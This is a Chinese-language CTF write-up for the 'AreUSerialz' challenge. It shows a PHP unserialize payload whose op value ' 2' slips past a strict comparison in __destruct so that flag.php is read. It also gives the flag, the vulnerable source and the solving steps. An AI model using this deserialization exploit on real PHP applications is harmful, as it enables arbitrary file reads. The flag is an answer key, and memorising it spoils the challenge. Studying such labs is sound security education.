AreUSerialz

• 一、答案
• 二、解题流程

一、答案

题目地址如下所示：
AreUSerialz

poc如下所示：
/?str=O:11:“FileHandler”:3:{s:2:“op”;s:2:" 2";s:8:“filename”;s:8:“flag.php”;s:7:“content”;s:2:“xx”;}

flag:ctfhub{96e5b05df6c9444d3fcda946}

二、解题流程

如下代码所示，是该题的代码：

protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}private function write() {if(isset($this->filename) && isset($this->content)) {if(strlen((string)$this->content) > 100) {$this->output("Too long!");die();}$res = file_put_contents($this->filename, $this->content);if($res) $this->output("Successful!");else $this->output("Failed!");} else {$this->output("Failed!");}}private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}private function output($s) {echo "[Result]: 
";echo $s;}function __destruct() {if($this->op === "2")$this->op = "1";$this->content = "";$this->process();}}function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str);}}

整个代码的流程如下所示：

1. 首先第一步读取的字符串应该是什么

   	public $op = ' 2';public $filename = 'flag.php';public $content = 'xx';
   }
   $a = new FileHandler();
   $b = serialize($a);
   echo $b . PHP_EOL; //我们的目标就是得到$b
   $c = unserialize($b);
   echo $c->op;
   ?>
   

2. 由于：

    function __destruct() {if($this->op === "2")$this->op = "1";
   

   所以，public $op = ' 2';绕过

3. 由于第五步：

   private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;
   }
   

   所以，public $filename = 'flag.php';读取flag